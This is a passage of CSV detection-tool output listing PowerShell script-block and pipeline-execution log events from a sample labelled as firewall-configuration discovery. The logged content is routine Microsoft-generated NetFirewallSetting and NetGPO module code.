$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdleti,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.145 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"zation_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 
'Set-NetFirewallSetting'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.145 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.145 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, 
[Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP 
NetFirewallSetting.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.145 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetSecuritySettingData')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption] ${Exemptions}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulFtp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulPptp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] 
${RemoteMachineTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${RequireFullAuthSupport}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck] ${CertValidationLevel}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT] ${AllowIPsecThroughNAT}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSAIdleTimeSeconds}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding] ${KeyEncoding}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing] ${EnablePacketQueuing}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject 
(cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Exemptions')) { [object]$__cmdletization_value = ${Exemptions} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulFtp')) { [object]$__cmdletization_value = ${EnableStatefulFtp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulPptp')) { [object]$__cmdletization_value = ${EnableStatefulPptp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTransportAuthorizationList} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTunnelAuthorizationList} $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTransportAuthorizationList} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_method",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.145 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"Parameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTunnelAuthorizationList} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireFullAuthSupport')) { [object]$__cmdletization_value = ${RequireFullAuthSupport} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('CertValidationLevel')) { [object]$__cmdletization_value = ${CertValidationLevel} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowIPsecThroughNAT')) { [object]$__cmdletization_value = ${AllowIPsecThroughNAT} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSAIdleTimeSeconds')) { [object]$__cmdletization_value = ${MaxSAIdleTimeSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyEncoding')) { [object]$__cmdletization_value = ${KeyEncoding} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnablePacketQueuing')) { [object]$__cmdletization_value = ${EnablePacketQueuing} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml 
}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.161 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallSetting""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.161 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.161 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.161 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; 
value=""System.Collections.Generic.Dictionary[string,string]""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.161 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.161 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Open-NetGPO""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.161 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Save-NetGPO""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.161 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetGPO 
",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.161 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetGPO' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function 